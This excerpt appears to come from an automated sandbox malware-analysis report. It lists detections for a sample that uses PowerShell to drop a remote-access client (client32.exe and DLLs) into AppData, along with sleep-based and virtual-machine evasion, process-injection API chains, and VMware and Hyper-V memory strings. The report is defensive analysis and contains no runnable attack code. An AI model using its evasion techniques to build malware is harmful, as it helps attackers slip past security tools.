                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Contains functionality to detect sleep reduction / modifications
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC94F3037_2_6CC94F30
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC891F037_2_6CC891F0
                                  Delayed program exit found
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110B8200 Sleep,ExitProcess,37_2_110B8200
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,37_2_6CC97F80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\osk.exeWindow / User API: threadDelayed 523Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8623Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1254Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1453Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6933Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-94918
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-96517
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-99945
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvaded block: after key decisiongraph_37-100333
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_37-100077
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_37-99703
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI coverage: 5.7 %
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC891F037_2_6CC891F0
                                  Source: C:\Windows\System32\osk.exe TID: 2980Thread sleep time: -60000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 8623 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 1254 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 1453 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 6933 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CC93226h37_2_6CC93130
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeThreadpool analyzer: Sleep duration: 300000ms
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,37_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,37_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,37_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,37_2_111266E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,37_2_1110AFD0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7E3438 GetSystemInfo,34_2_00007FFC8B7E3438
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: VMware
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A75D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                                  Source: explorer.exe, 00000016.00000002.2440811565.0000000008894000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTORVMWare
                                  Source: chrome.exe, 00000000.00000003.2330546951.000028EC04D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329891050.000028EC04A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\u003d\u003d\",\"interpreterSafeUrl\":{\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\":\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\"},\"serverEnvironment\":1}}},\"videoFlags\":{\"playableInEmbed\":true,\"isCrawlable\":true},\"previewPlayabilityStatus\":{\"status\":\"OK\",\"playableInEmbed\":true,\"contextParams\":\"Q0FJU0FnZ0E\u003d\"},\"embeddedPlayerMode\":\"EMBEDDED_PLAYER_MODE_DEFAULT\",\"embeddedPlayerConfig\":{\"embeddedPlayerMode\":\"EMBEDDED_PLAYER_MODE_DEFAULT\",\"embeddedPlayerFlags\":{}},\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}","video_id":"h15NcT6UXh0"},"POST_MESSAGE_ORIGIN":"*","VIDEO_ID":"h15NcT6UXh0","DOMAIN_ADMIN_STATE":""});window.ytcfg.obfuscatedData_ = [];
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor>
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                                  Source: explorer.exe, 00000016.00000000.1602380186.0000000006EDD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V rytllcpqlndyltx Bus Pipes
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processorft
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34
                                  Source: explorer.exe, 00000016.00000003.2247809094.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&00000
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD0021-224I
                                  Source: explorer.exe, 00000016.00000002.2440811565.00000000087F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000089C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor{-
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorDTs
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34VMware20,1
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipest
